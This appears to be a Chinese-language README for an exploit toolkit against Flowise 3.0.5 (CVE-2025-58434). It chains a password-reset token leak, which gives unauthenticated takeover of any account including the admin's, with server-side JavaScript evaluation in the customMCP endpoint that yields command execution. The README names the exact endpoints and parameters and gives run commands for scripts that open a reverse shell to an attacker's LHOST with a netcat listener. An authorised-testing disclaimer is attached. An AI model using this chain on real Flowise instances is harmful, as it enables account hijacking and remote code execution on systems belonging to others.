两个 Flowise 3.0.5 问题,已链接:
POST /api/v1/account/forgot-password 直接在 JSON 响应中返回目标用户的 tempToken。将其提供给 POST /api/v1/account/reset-password 即可为任何账户(包括第一个管理员)设置已知密码 -> 完全未认证账户接管。mcpServerConfig 服务端 JavaScript 评估。
拥有会话和工作区 API 密钥(来自步骤 1)后,
POST /api/v1/node-load-method/customMCP 配合 loadMethod=listActions
会将 mcpServerConfig 字符串作为 JavaScript 在 Flowise 进程中评估,
从而获得 require('child_process').exec() RCE。(此处仅用于将 ATO 转化为代码执行的独立 Flowise 问题;撰写本文时尚未分配 CVE。)CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - 完整链(ATO -> API 密钥 -> CustomMCP 反向 shell)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# 请准备好 `nc -lvnp <LPORT>`
flowise_customMCP_rce.py - 仅 CustomMCP RCE(需要 API 密钥)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
仅用于授权安全测试和教育目的。仅可针对您拥有或已获得明确书面许可的系统运行。
作者:r3vpwnx